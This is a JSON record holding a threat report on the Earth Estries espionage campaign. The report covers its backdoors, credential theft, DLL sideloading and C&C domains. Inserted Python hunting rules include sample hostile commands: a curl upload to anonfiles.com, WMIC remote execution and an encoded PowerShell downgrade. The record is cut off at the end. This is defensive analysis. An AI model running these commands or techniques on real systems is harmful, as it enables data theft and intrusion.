{
	"id": "768fc151-afd9-404b-b6b5-adc18ed58da8",
	"created_at": "2026-04-06T00:17:35.290047Z",
	"updated_at": "2026-04-10T13:12:38.292958Z",
	"deleted_at": null,
	"sha1_hash": "2262c24115e3030b2c4a9eead986751226d2dc4d",
	"title": "Earth Estries Targets Government, Tech for Cyberespionage",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3815023,
	"plain_text": "Earth Estries Targets Government, Tech for Cyberespionage\r\nPublished: 2023-08-30 · Archived: 2026-04-05 17:16:23 UTC\r\nAPT \u0026 Targeted Attacks\r\nWe break down a new cyberespionage campaign deployed by a cybercriminal group we named Earth Estries. Analyzing the tactics, techniques, and procedures (TTPs) employed, we observed overlaps with the advanced persistent threat (APT) group FamousSparrow as Earth Estries targets governments and organizations in the technology sector.\r\nBy: Ted Lee, Lenart Bermejo, Hara Hiroaki, Leon M Chang, Gilbert Sison Aug 30, 2023 Read time: 12 min (3192 words)\r\nEarlier this year, we discovered a new cyberespionage campaign by a hacker group we named Earth Estries. Based on our observations, Earth Estries has been active since at least 2020. We also found some overlaps between the tactics, techniques, and procedures (TTPs) used by Earth Estries and those used by another advanced persistent threat (APT) group, FamousSparrow.\r\nFrom a general overview of the tools and techniques used in this ongoing campaign, we believe the threat actors behind Earth Estries are working with high-level resources and functioning with sophisticated skills and experience in cyberespionage and illicit activities. The threat actors also use multiple backdoors and hacking tools to enhance intrusion vectors. To leave as little footprint as possible, they use PowerShell downgrade attacks (forcing the legacy PowerShell 2.0 engine, which predates AMSI) to avoid detection by the Windows Antimalware Scan Interface (AMSI) logging mechanism. In addition, the actors abuse public services such as GitHub, Gmail, AnonFiles, and File.io to exchange or transfer commands and stolen data.\r\nThis active campaign targets organizations in the government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the US. 
We detail our findings and technical analysis in this entry to guide security teams and organizations in reviewing the status of their respective digital assets and in enhancing their existing security configurations.\r\nInfection vector\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 1 of 17\r\nFigure 1. The attack routine of Earth Estries\r\nWe found Earth Estries compromising existing accounts with administrative privileges after it successfully infected one of the organization’s internal servers. By installing Cobalt Strike on the system, the actors behind Earth Estries were able to deploy more pieces of malware and perform lateral movement. Through Server Message Block (SMB) and the WMI command line (WMIC), the threat actors propagated backdoors and hacking tools to other machines in the victim’s environment. At the end of each round of operations in a series of deployments, they archived the collected data from a specified folder. According to our samples and analysis, the threat actors targeted PDF and DDF files, which the actors uploaded to the online storage services AnonFiles or File.io using curl.exe.\r\nWe also noted that the threat actors regularly cleaned up their existing backdoor after finishing each round of operations and redeployed a new piece of malware when they started another round. We believe that they do this to reduce the risk of exposure and detection.\r\nBackdoor and hacking tools\r\nWe observed the threat actors using various tools in this campaign, including information stealers, browser data stealers, and port scanners, among others. 
In this section, we focus on newly discovered and noteworthy toolsets and discuss their technical details.\r\nZingdoor\r\nZingdoor is a new HTTP backdoor written in Go. While we first encountered Zingdoor in April 2023, some logs indicate that the earliest development of this backdoor took place in June 2022. However, it had rarely been seen in the wild and had only been observed in a limited number of victims, likely because it is a newly designed backdoor with cross-platform capabilities. Zingdoor is packed using UPX and heavily obfuscated by a custom obfuscator engine.\r\nWe noted that Zingdoor adopts an anti-UPX unpacking technique. Normally the UPX magic number is “UPX!”, but in this case it was modified to “MSE!”, so the stock UPX tool no longer recognizes the file as UPX-packed and cannot unpack it. This technique is trivial to apply and common in internet of things (IoT) malware, but it is considered rare in APT activity.\r\nZingdoor was disguised as mpclient.dll and designed to run via DLL sideloading by abusing the Windows Defender binary MsSecEs.exe. Upon running the executable, Zingdoor registers the current parent process as a Windows service with the name \"MsSecEsSvc\" for persistence and starts it. As a service process, Zingdoor connects to the command-and-control (C\u0026C) server and waits for commands. Based on the functions defined in the backdoor, it supports the following capabilities:\r\nGet system information\r\nGet Windows service information\r\nDisk management (file upload/download, file enumeration)\r\nRun arbitrary commands\r\nFigure 2. Modified UPX header for anti-UPX unpacking technique\r\nTrillClient\r\nThe TrillClient toolset is an information stealer designed to steal browser data. It is packed in a single cabinet file (.cab) and extracted with the built-in utility expand.exe. 
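The anti-UPX trick described for Zingdoor above can be checked and undone mechanically. The following Python routine is an added example written for this page, not Trend Micro’s tooling or code from the malware: it walks the PE section table, flags a file that still carries UPX0/UPX1 sections but no ‘UPX!’ magic anywhere, and rewrites an analyst-supplied replacement magic (‘MSE!’ in this report) back to ‘UPX!’ so a stock upx -d run can proceed. The build_fake_upx_pe helper produces a constructed, non-loadable PE skeleton for testing only; the two magic occurrences it yields are a property of that skeleton, not a claim about real samples.

```python
import struct

UPX_MAGIC = b'UPX!'


def pe_sections(data: bytes):
    # Minimal PE section-table walk.
    # Returns a list of (name, virtual_size, virtual_addr, raw_size, raw_ptr).
    if data[:2] != b'MZ':
        raise ValueError('not an MZ/PE file')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE' + bytes(2):
        raise ValueError('missing PE signature')
    nsec = struct.unpack_from('<H', data, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from('<H', data, e_lfanew + 20)[0]   # COFF SizeOfOptionalHeader
    off = e_lfanew + 24 + opt_size                                # first IMAGE_SECTION_HEADER
    out = []
    for _ in range(nsec):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from('<8sIIII', data, off)
        out.append((name.rstrip(bytes(1)).decode('ascii', 'replace'), vsize, vaddr, rawsize, rawptr))
        off += 40
    return out


def upx_status(data: bytes, suspected_magic: bytes = b'MSE!') -> dict:
    # UPX normally leaves UPX0/UPX1 section names and the UPX! magic in its headers.
    # Zingdoor keeps the section names but rewrites the magic, so we count both.
    names = [s[0] for s in pe_sections(data)]
    return {
        'upx_sections': [n for n in names if n.startswith('UPX')],
        'genuine_magic': data.count(UPX_MAGIC),
        'suspected_magic': data.count(suspected_magic),
    }


def looks_tampered(status: dict) -> bool:
    # UPX-style sections but no genuine magic anywhere: upx -d will refuse the file
    return bool(status['upx_sections']) and status['genuine_magic'] == 0


def restore_upx_magic(data: bytes, altered_magic: bytes) -> bytes:
    # Put the real magic back so a stock UPX build can unpack the sample.
    # altered_magic is whatever the analyst saw in place of UPX! (MSE! in this report).
    if len(altered_magic) != 4:
        raise ValueError('UPX magic is exactly 4 bytes')
    return data.replace(altered_magic, UPX_MAGIC)


def build_fake_upx_pe(magic: bytes) -> bytes:
    # Constructed, non-loadable PE skeleton with a UPX-like layout, for testing only:
    # DOS header, COFF header, zeroed PE32 optional header, UPX0/UPX1/.rsrc sections,
    # a 12-byte l_info-style record at the start of UPX1 data, and a 32-byte trailer.
    e_lfanew, opt_size = 0x40, 0xE0
    dos = bytearray(e_lfanew)
    dos[:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, e_lfanew)
    coff = struct.pack('<HHIIIHH', 0x14C, 3, 0, 0, 0, opt_size, 0x102)
    hdr_end = e_lfanew + 4 + len(coff) + opt_size
    raw = hdr_end + 3 * 40
    upx1 = struct.pack('<I4sHBB', 0, magic, 0, 13, 36) + bytes(12) + b'compressed-image-placeholder'
    rsrc = bytes(16)

    def sec(name, vsize, vaddr, rawsize, rawptr, flags):
        return struct.pack('<8sIIIIIIHHI', name.ljust(8, bytes(1)), vsize, vaddr,
                           rawsize, rawptr, 0, 0, 0, 0, flags)

    sections = (sec(b'UPX0', 0x8000, 0x1000, 0, 0, 0xE0000080)
                + sec(b'UPX1', 0x1000, 0x9000, len(upx1), raw, 0xE0000040)
                + sec(b'.rsrc', 0x1000, 0xA000, len(rsrc), raw + len(upx1), 0xC0000040))
    trailer = magic + bytes(28)
    return bytes(dos) + b'PE' + bytes(2) + coff + bytes(opt_size) + sections + upx1 + rsrc + trailer


if __name__ == '__main__':
    sample = build_fake_upx_pe(b'MSE!')
    status = upx_status(sample)
    print('status:', status, 'tampered:', looks_tampered(status))
    if looks_tampered(status) and status['suspected_magic']:
        fixed = restore_upx_magic(sample, b'MSE!')
        print('UPX! occurrences after repair:', fixed.count(UPX_MAGIC))
```

The detection half does not need to know the replacement string: intact UPX section names with zero ‘UPX!’ occurrences is enough to flag the file. The repair half does, and it only helps when the magic is the sole change; if a sample also renames the sections or strips the pack header, the file has to be unpacked manually.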
The CAB file contains a TrillClient installer and a stealer. Depending on the argument given, the installer performs the following behaviors:\r\nTable 1. TrillClient arguments and behaviors\r\nArgument | Description\r\n-install | Installs itself as the Windows service Net Connection\r\n-start {victim id} | Creates a victim list based on the input victim ID (file name: 7C809B4866086EF7FB1AB722F94DF5AF493B80DB), then launches the TrillClient stealer by starting the service\r\n-remove | Cleans up the installation (deletes the service)\r\nTrillClient is a custom browser data stealer written in Go, heavily obfuscated by a custom obfuscator for anti-analysis. Once launched, it looks for the victim list, 7C809B4866086EF7FB1AB722F94DF5AF493B80DB, created by the installer. Afterward, it connects to a GitHub repository to retrieve the command for the next set of actions. The repository address is hard-coded in the malware as follows:\r\nhxxps://raw[.]githubusercontent[.]com/trillgb/codebox/main/config.json\r\nFigure 3. Sample content of “config.json”\r\nvalue.name is the victim ID, while value.value is a command. After receiving this configuration, TrillClient looks for its own victim ID in the value.name list and performs malicious activities based on the command defined by value.value. TrillClient supports the following commands:\r\nTable 2. TrillClient commands and functions\r\nCommand | Function\r\n1 | Does nothing\r\n2 | Starts to collect browser credentials\r\n3 | Schedules a task to collect browser credentials at 12 p.m. today or tomorrow\r\n4 | Starts to collect browser credentials after a delay (no definite duration, estimated to be a random number of seconds)\r\nTrillClient steals the sensitive data found in the following locations:\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\\u003cPROFILE\u003e\\Login Data\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\\u003cPROFILE\u003e\\Network\\Cookies\r\n%APPDATA%\\Microsoft\\Protect\\*\r\nCollecting the DPAPI master key files under %APPDATA%\\Microsoft\\Protect alongside the Chrome files is what makes offline decryption of the stolen credentials possible (given the user’s password or hash). The collected data is temporarily copied to \u003c%TEMP%\\browser_temp_data\u003cRANDOM\u003e\u003e, archived with tar, and encrypted with an XOR algorithm. The archive is then sent to the threat actor’s email account trillgamby@gmail[.]com over SMTP (Simple Mail Transfer Protocol). Another noteworthy capability of TrillClient is its ability to update itself: if the “version” value in the downloaded config is newer than its own version number, it downloads the newer build from the GitHub repository and replaces itself.\r\nHemiGate\r\nHemiGate is a backdoor used by Earth Estries. Like most of the tools used by this threat actor, this backdoor is also executed via DLL sideloading using one of the loaders that support interchangeable payloads. K7AVMScn.exe from K7 Computing is the sideloading host utilized by this backdoor, while the loader poses as K7AVWScn.dll. The main backdoor is an encrypted file named taskhask.doc, and another encrypted file named taskhask.dat serves as the configuration file.\r\nFigure 4. HemiGate sideloading sequence\r\nHemiGate communicates with its C\u0026C server over port 443 and connects via a proxy if required by the environment. 
The C\u0026C server is retrieved from the configuration file, which mainly contains C\u0026C server and port combinations. The config file is decrypted with RC4 using the key 4376dsygdYTFde3; the same RC4 key is reused in most of the backdoor’s other encryption and decryption routines. Communication with the server uses the HTTP POST method with the following predefined header:\r\nFigure 5. HemiGate communication header\r\nHemiGate executes in three instances:\r\nFirst instance. Launched without any parameter. Its main purpose is to install the startup mechanisms and execute the second instance, after which it terminates.\r\nStartup 1. An entry in the autostart registry named “Windrive” is created.\r\nStartup 2. A service called “Windrive” with the display name “Windows Drive Security” is created as another startup mechanism.\r\nSecond instance. Executed with the /a argument, this instance reads the config file and communicates with the C\u0026C server. It also serves as the launcher and communicates with the third instance via named pipes. In addition, the second instance performs the following functions:\r\nUpdates the configuration\r\nReceives the data captured by the keylogger function via pipe and logs it into a file\r\nServes as watchdog for the third instance\r\nDirectly executes backdoor commands if the parameter is satisfied or if the pipe communication fails\r\nPasses backdoor command execution to the third instance if the parameter from the C\u0026C is true and the pipe communication is successful\r\nExecutes a full uninstall if the command is received from the C\u0026C\r\nThird instance. Launched with the /u \u003cPID of instance 2\u003e argument. 
The following are its two main functions:\r\nExecutes the keylogger routine and passes captured data to the second instance via pipe communication (the keylogger pipe is \\\\[.]\\pipe\\Key[500])\r\nOpens a pipe to receive and execute commands passed by the second instance (commands are received via \\\\[.]\\pipe\\\u003cusername\u003e\\[\u003csession number\u003e])\r\nFigure 6. HemiGate process tree\r\nThe keylogger feature creates a non-interactive window of the predefined “static” class. A timer function is then used alongside a keyboard hook to log the keystrokes on the active window continuously, as long as that window remains active. Each keystroke is logged using the following structure:\r\nUser: Active user at the time of logging\r\nTitle: Active window title\r\nTime: Time of the keystroke log (format: dd/mm hh:mm:ss)\r\nKey: Logged keystrokes\r\nAside from the keylogger, the following features are also available:\r\nDirectory monitoring: Sets a directory notification handle to receive notifications for added files, deleted files, changes in files, and file name changes (records old and new names) in the target directory. 
The changes recorded are stored in a file named “fm.”\r\nFile content read/write: Writes contents to a target file or reads the contents of the target file.\r\nFile operations: Enumerates drives; moves, copies, renames, or deletes files; creates directories; or opens files using their default applications.\r\nShell: Launches an interactive command shell.\r\nCMD: Executes a command via cmd (one-time execution).\r\nScreenshot: Takes a screenshot of the active desktop window.\r\nProcess monitor: Enumerates currently running processes and allows the termination of a target process.\r\nHeavy use of DLL sideloading\r\nWe observed that Earth Estries relies heavily on DLL sideloading to load various tools within its arsenal. Aside from the backdoors previously mentioned, this intrusion set also uses common remote control tools such as Cobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages. These tools come as encrypted payloads loaded by custom loader DLLs.\r\nA notable feature of the loaders is that the decryption key is carried inside the encrypted payload file itself, so the same loader DLL can decrypt whichever payload is dropped next to it. Accordingly, we observed this intrusion set reusing the same loader file to load different payloads in the same target environment. During our investigation, we identified several sideloading combinations used by Earth Estries and enumerate them in the following table:\r\nTable 3. Legitimate executables and sideloaded DLLs abused by Earth Estries\r\nAffected vendor | Legitimate executable | Sideloaded DLL\r\nCanon Inc. | ijplmui.exe | IJPLMCOM.dll\r\nBrother Industries Ltd (Signer: Dell Inc.) | brdifxapi.exe | brlogapi.dll / brlogapi64.dll\r\nIObit Malware Fighter | imfsbCrypto.exe | imfsbDll.dll\r\nK7 Computing Pvt Ltd | K7AVMScn.exe | K7AVWScn.dll\r\nK7 Computing Pvt Ltd | K7TSVlog.exe | K7UI.dll\r\nK7 Computing Pvt Ltd | K7SysMon.EXE | K7SysMn1.dll\r\nMicrosoft Corporation | iisexpresstray.exe | mscoree.dll\r\nNetgate Technologies s.r.o. | seanalyzertool.exe | msimg32.dll\r\nOracle Corporation | jps.exe | jli.dll\r\niTop Inc. (Signer: Orange View Ltd) | graphics-check.exe (renamed sfc.exe by the attacker) | dxgi.dll\r\nXanasoft.com | SandboxieBITS.exe | SbieDll.dll\r\nBy and large, the DLL sideloading attacks we’ve observed are against older versions of legitimate files, some even a decade old, in a bid to turn them into LOLBins. Attackers use this opportunistic tactic in the hope that the signed, well-known binaries are ignored by security products. This makes it even more important to implement version controls and application baselines to detect anomalies and prevent attackers from gaining footholds in the enterprise environment.\r\nC\u0026C server infrastructure\r\nWe observed that some of the Cobalt Strike implants Earth Estries used relied on the Fastly CDN service to hide the actual IP address. We have also previously observed the use of Fastly CDN in other campaigns by APT41-related groups such as Earth Longzhi and GroupCC.\r\nLooking into other Earth Estries C\u0026C activities observed from their victims’ environments, we discovered some notable pieces of data in the registrant information as follows:\r\nTable 4. 
Information on C\u0026C activities referenced with WHOIS protocol\r\nDomain | Registrant information\r\nnx2.microware-help[.]com, east.smartpisang[.]com | Registrar: Xin Net Technology Company; Registrar: Bizcn, Inc.\r\ncdn728a66b0.smartlinkcorp[.]net | Organization: De Wang Mao Yi You Xian Gong Si (De Wang 貿易有限公司); City: Qinyuanshi (清遠市)\r\ncdn-6dd0035.oxcdntech[.]com | Organization: De Wang Mao Yi You Xian Gong Si (De Wang 貿易有限公司)\r\nvultr-dns[.]com | Email: 3280132818@qq[.]com\r\nThe domains in Table 4 were observed in real incidents. According to public repositories, those C\u0026C domains share the same registrant information, and we infer that the actors have preferences when it comes to registrant details. In addition, these domains share similar C\u0026C hostname formats, some of which we observed while tracking their operations. While our investigation is ongoing to determine whether these domains and registrant data are related to the threat actors, we do know that these pieces of information can be used to pivot to other related C\u0026C domains likely used by the same group.\r\nBased on the registrant information, we found more records of older domains registered by the threat actors.\r\nTable 5. 
History of registered domains following the keyword “De Wang Mao Yi You Xian Gong Si”\r\nDomain keyword search: \"De Wang Mao Yi You Xian Gong Si\"\r\nDomain | Registered / First seen | Expires / Last seen\r\nrtsafetech[.]com | Oct 8, 2022 | Oct 8, 2023\r\nkeyplancorp[.]com | Dec 22, 2021 | Dec 16, 2023\r\ntrhammer[.]com | Sep 5, 2022 | Jul 12, 2023 (last seen)\r\nrthtrade[.]com | Nov 23, 2021 | Nov 23, 2023\r\nsmartlinkcorp[.]net | May 2, 2022 (first seen) | Jul 12, 2023 (last seen)\r\noxcdntech[.]com | Feb 15, 2023 (first seen) | Jul 12, 2023 (last seen)\r\nrtwebmaster[.]com | Nov 20, 2021 (first seen) | Jul 12, 2023 (last seen)\r\nTable 6. History of registered domains following the keyword “3280132818@qq[.]com”\r\nDomain keyword search: “3280132818@qq[.]com”\r\nDomain | Registered | Expires\r\nmncdntech[.]com | Jul 4, 2023 | Jul 4, 2024\r\nsubstantialeconomy[.]com | Jun 30, 2023 | May 25, 2024\r\njptomorrow[.]com | Jun 19, 2023 | Apr 19, 2024\r\nvultr-dns[.]com | Jun 10, 2023 | Jun 10, 2024\r\njttoday[.]net | May 21, 2023 | Mar 21, 2024\r\nChecking all the domains, we observed that smartlinkcorp[.]net yielded the most information from public repositories and the threat intelligence community. Digging into the domain, we discovered a record of a related subdomain, ns2.smartlinkcorp[.]net. In addition, Cobalt Strike was once hosted on ns2.smartlinkcorp[.]net with the watermark 2029527128. Based on the watermark, we found more related domains and IP records.\r\nFigure 7. Cobalt Strike records found\r\nFrom these Cobalt Strike records, we noticed two new domains, digitelela[.]com and z7-tech[.]com, which we did not observe in our initial investigations. We then found another domain set possibly used by the threat actors based on the registrant information.\r\nTable 7. 
Registered domains’ histories following the keyword “3087384364@qq[.]com”\r\nDomain keyword search: “3087384364@qq[.]com”\r\nDomain | Registered | Expires\r\nz7-tech[.]com | Apr 8, 2023 07:40:13 a.m. | May 7, 2024 06:12:13 a.m.\r\nhammercdntech[.]com | Apr 2, 2023 09:06:05 p.m. | Feb 1, 2024 01:10:53 a.m.\r\nlinkaircdn[.]com | Mar 20, 2023 11:00:31 p.m. | Apr 6, 2024 07:56:21 a.m.\r\nrtsoftcorp[.]com | Mar 12, 2023 11:30:17 p.m. | Mar 13, 2024 06:31:22 p.m.\r\npublicdnsau[.]com | Feb 2, 2023 10:40:27 p.m. | Mar 7, 2024 06:11:58 p.m.\r\nuswatchcorp[.]com | Jan 1, 2023 10:48:42 p.m. | Feb 11, 2024 06:40:36 p.m.\r\nanynucleus[.]com | Oct 30, 2022 06:11:31 a.m. | Nov 15, 2023 11:12:23 p.m.\r\ndigitelela[.]com | Oct 7, 2022 07:27:56 p.m. | Oct 2, 2023 06:00:40 p.m.\r\ndns2021[.]net | Apr 10, 2022 09:33:30 a.m. | Feb 27, 2023 07:59:16 a.m.\r\nlyncidc[.]com | N/A | Aug 19, 2021 01:00:32 a.m.\r\nLike the domain sets listed in Table 4, these domains and subdomains share several common traits, such as the registration country. Specifically, the hostnames follow an ns{number}.{domain} format and are set up for a Cobalt Strike beacon to send and receive commands via DNS tunneling:\r\ncdn-xxxxx.{domain}\r\ncdnxxxxxxxx.{domain}\r\nxxxxxx.ns1.{domain}\r\nxxxxxx.ns2.{domain}\r\nxxxxxx.ns3.{domain}\r\nxxxxxx.ns4.{domain}\r\nAnalyzing the preceding C\u0026C domains and the resolved IP addresses, we found their C\u0026C servers hosted on virtual private server (VPS) services located in different countries. We summarize the distribution of C\u0026C servers here:\r\nFigure 8. 
Heat map distribution of C\u0026C server services used by Earth Estries\r\nVictimology\r\nBased on our investigation, Earth Estries focuses its targeting on government-related organizations and technology companies in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the US. We also observed network traffic to C\u0026C servers in Canada and toolset detections in India and Singapore, making these regions potentially affected as well. Organizations in the identified countries should not only reexamine their systems for possible intrusions and unauthorized traffic but also reinforce their existing security measures.\r\nFigure 9. Distribution of targeted and potentially affected countries\r\nAttribution\r\nWhile tracking the campaign, we noticed the threat actors using “ping” to test whether a remote server is reachable before accessing it. Figure 10 shows one of the tests performed by Earth Estries; at the same time, our tracking found that the threat actors tried to see whether the remote server with IP address 103.133.137[.]157 was available.\r\nFigure 10. Sample tracking of Earth Estries’ ping tests (screenshot taken using Trend Vision One™)\r\nIn addition, Earth Estries used some tools and TTPs that overlap with FamousSparrow. We compared the backdoor loader used in this campaign to the loader mentioned in the previous report. As for TTPs, Earth Estries also tends to use .CAB files to deploy its malware and toolset to the victim’s environment, which reinforces our tracking and the initial reports about the actors responsible for these attacks.\r\nFigure 11. 
The loader previously mentioned in an earlier report (left), and the loader we observed in the latest campaign (right)\r\nConclusion\r\nEarth Estries is a sophisticated hacker group that has been active since at least 2020 and focuses on cyberespionage campaigns. It targets government and technology organizations in various countries and is capable of advanced techniques such as the use of multiple backdoors and hacking tools to gain access to its targets.\r\nBy compromising internal servers and valid accounts, the threat actors can move laterally within the victim’s network and carry out their malicious activities covertly. Zingdoor’s anti-unpacking measures add work for analysts and security teams and make the backdoor harder to analyze. The actors also use techniques like PowerShell downgrade attacks and novel DLL sideloading combinations to evade detection. Moreover, the code similarities and shared TTPs between Earth Estries and FamousSparrow suggest a possible connection between them. Other pieces of evidence, such as tracked IP addresses and common technical formatting themes observed in their operations, indicate strong ties that can be investigated and analyzed further.\r\nUnderstanding the methods used by Earth Estries can help organizations improve their security measures and protect their digital assets. It is essential for individuals and companies to stay vigilant and take the necessary actions to enhance their cybersecurity to safeguard against such cyberespionage campaigns.\r\n
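Several of the behaviors described in this entry (the PowerShell downgrade in the introduction, the curl.exe uploads to AnonFiles and File.io and the WMIC propagation under Infection vector, and the executable/DLL pairs of Table 3) can be turned into simple hunting rules over endpoint telemetry. The following Python is an added example for this page, not Trend Micro’s detection logic: the record layout (image path, command line, optional loaded DLL path), the ‘trusted directory’ list, and the WMIC ‘/node: … process call create’ form are assumptions, and the sample records are constructed, not taken from an incident.

```python
SEP = chr(92)  # Windows path separator, built with chr() so no escape sequences are needed


def win(path: str) -> str:
    # Builds a Windows path from a forward-slash path (used for the constructed samples)
    return path.replace('/', SEP)


def norm(path: str) -> str:
    return path.replace(SEP, '/').lower()


def basename(path: str) -> str:
    return norm(path).rsplit('/', 1)[-1]


# Host executable -> sideloaded DLL(s), taken from Table 3 of the report (lower-cased)
SIDELOAD_PAIRS = {
    'ijplmui.exe': {'ijplmcom.dll'},
    'brdifxapi.exe': {'brlogapi.dll', 'brlogapi64.dll'},
    'imfsbcrypto.exe': {'imfsbdll.dll'},
    'k7avmscn.exe': {'k7avwscn.dll'},
    'k7tsvlog.exe': {'k7ui.dll'},
    'k7sysmon.exe': {'k7sysmn1.dll'},
    'iisexpresstray.exe': {'mscoree.dll'},
    'seanalyzertool.exe': {'msimg32.dll'},
    'jps.exe': {'jli.dll'},
    'sfc.exe': {'dxgi.dll'},  # iTop graphics-check.exe renamed by the attacker
    'sandboxiebits.exe': {'sbiedll.dll'},
}
# Assumed baseline: DLLs loaded from these trees belong to the OS or an installed product
TRUSTED_DIRS = ('c:/windows/', 'c:/program files/', 'c:/program files (x86)/')
EXFIL_HOSTS = ('anonfiles.com', 'file.io')


def is_trusted_dir(path: str) -> bool:
    return norm(path).startswith(TRUSTED_DIRS)


def powershell_downgrade(rec: dict) -> bool:
    # -Version 2 (or 2.0) forces the legacy engine; PowerShell accepts any prefix of
    # -Version down to -v, so match every abbreviation followed by the version token.
    if basename(rec['image']) != 'powershell.exe':
        return False
    toks = rec.get('cmdline', '').lower().split()
    for i, tok in enumerate(toks[:-1]):
        if len(tok) >= 2 and '-version'.startswith(tok) and toks[i + 1] in ('2', '2.0'):
            return True
    return False


def url_hosts(cmdline: str):
    # Yields the host part of every URL-looking token in a command line
    for tok in cmdline.lower().split():
        if '://' in tok:
            yield tok.split('://', 1)[1].split('/', 1)[0]


def curl_exfil(rec: dict) -> bool:
    if basename(rec['image']) != 'curl.exe':
        return False
    hosts = list(url_hosts(rec.get('cmdline', '')))
    return any(h == e or h.endswith('.' + e) for h in hosts for e in EXFIL_HOSTS)


def wmic_remote_exec(rec: dict) -> bool:
    # Assumed form of WMIC lateral movement: wmic /node:<host> process call create <cmd>
    cmd = rec.get('cmdline', '').lower()
    return basename(rec['image']) == 'wmic.exe' and '/node:' in cmd and 'process call create' in cmd


def sideload_pair(rec: dict) -> bool:
    # Fires only when a Table 3 host loads its paired DLL from outside the trusted trees
    host, dll = basename(rec['image']), rec.get('loaded')
    if host not in SIDELOAD_PAIRS or not dll:
        return False
    return basename(dll) in SIDELOAD_PAIRS[host] and not is_trusted_dir(dll)


RULES = {
    'powershell_downgrade': powershell_downgrade,
    'curl_exfil_to_file_sharing': curl_exfil,
    'wmic_remote_process_create': wmic_remote_exec,
    'dll_sideload_pair_untrusted_dir': sideload_pair,
}


def hunt(records):
    # Returns (record index, rule name) for every rule that matches a record
    return [(i, name) for i, rec in enumerate(records) for name, rule in RULES.items() if rule(rec)]


# Constructed sample records; none of these come from a real incident
SAMPLES = [
    {'image': win('C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe'),
     'cmdline': 'powershell.exe -v 2 -nop -w hidden -enc AAAA'},
    {'image': win('C:/Windows/System32/curl.exe'),
     'cmdline': 'curl.exe -F file=@' + win('C:/ProgramData/out.rar') + ' https://anonfiles.com/upload'},
    {'image': win('C:/Windows/System32/wbem/WMIC.exe'),
     'cmdline': 'wmic /node:10.0.0.25 process call create ' + win('C:/ProgramData/K7AVMScn.exe')},
    {'image': win('C:/ProgramData/K7AVMScn.exe'), 'cmdline': 'K7AVMScn.exe',
     'loaded': win('C:/ProgramData/K7AVWScn.dll')},
    {'image': win('C:/Program Files/K7 Computing/K7AVMScn.exe'), 'cmdline': 'K7AVMScn.exe',
     'loaded': win('C:/Program Files/K7 Computing/K7AVWScn.dll')},  # legitimate install, no hit
    {'image': win('C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe'),
     'cmdline': 'powershell.exe -NoProfile -File inventory.ps1'},  # benign, no hit
]

if __name__ == '__main__':
    for idx, rule in hunt(SAMPLES):
        print(idx, rule, SAMPLES[idx]['cmdline'])
```

The command-line check for the downgrade is a fallback; where the Windows PowerShell event log is available, event ID 400 records EngineVersion=2.0 for a downgraded session and is the more reliable signal. The sideloading rule deliberately ignores a Table 3 pair loaded from Windows or Program Files, so a legitimate install of the same product does not match; the baseline list should be adjusted to the environment.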
Trend Vision One™ gives security teams and analysts a single platform from which to visualize all the separate components of the organization and to monitor and track the tools, behaviors, and payloads as the attack routine attempts to move and execute across the organization’s networks, systems, and infrastructure, while detecting and blocking the threats as early in the attack or infection routine as possible.\r\nMITRE ATT\u0026CK\r\nIndicators of Compromise (IOCs)\r\nDownload the list of IOCs here.\r\nSource: https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html"
	],
	"report_names": [
		"earth-estries-targets-government-tech-for-cyberespionage.html"
	],
	"threat_actors": [
		{
			"id": "f67fb5b3-b0d4-484c-943e-ebf12251eff6",
			"created_at": "2022-10-25T16:07:23.605611Z",
			"updated_at": "2026-04-10T02:00:04.685162Z",
			"deleted_at": null,
			"main_name": "FamousSparrow",
			"aliases": [
				"Earth Estries"
			],
			"source_name": "ETDA:FamousSparrow",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5b317799-01c0-48fa-aee2-31a738116771",
			"created_at": "2022-11-20T02:02:37.746719Z",
			"updated_at": "2026-04-10T02:00:04.561617Z",
			"deleted_at": null,
			"main_name": "Earth Longzhi",
			"aliases": [
				"Earth Longzhi"
			],
			"source_name": "ETDA:Earth Longzhi",
			"tools": [
				"Agentemis",
				"BigpipeLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"CroxLoader",
				"MultiPipeLoader",
				"OutLoader",
				"Symatic Loader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f0eca237-f191-448f-87d1-5d6b3651cbff",
			"created_at": "2024-02-06T02:00:04.140087Z",
			"updated_at": "2026-04-10T02:00:03.577326Z",
			"deleted_at": null,
			"main_name": "GhostEmperor",
			"aliases": [
				"OPERATOR PANDA",
				"FamousSparrow",
				"UNC2286",
				"Salt Typhoon",
				"RedMike"
			],
			"source_name": "MISPGALAXY:GhostEmperor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d196cb29-a861-4838-b157-a31ac92c6fb1",
			"created_at": "2023-11-04T02:00:07.66699Z",
			"updated_at": "2026-04-10T02:00:03.386945Z",
			"deleted_at": null,
			"main_name": "Earth Longzhi",
			"aliases": [
				"SnakeCharmer"
			],
			"source_name": "MISPGALAXY:Earth Longzhi",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a09ade2a-6b87-4f9a-b4f8-23cf14f63633",
			"created_at": "2023-11-04T02:00:07.676869Z",
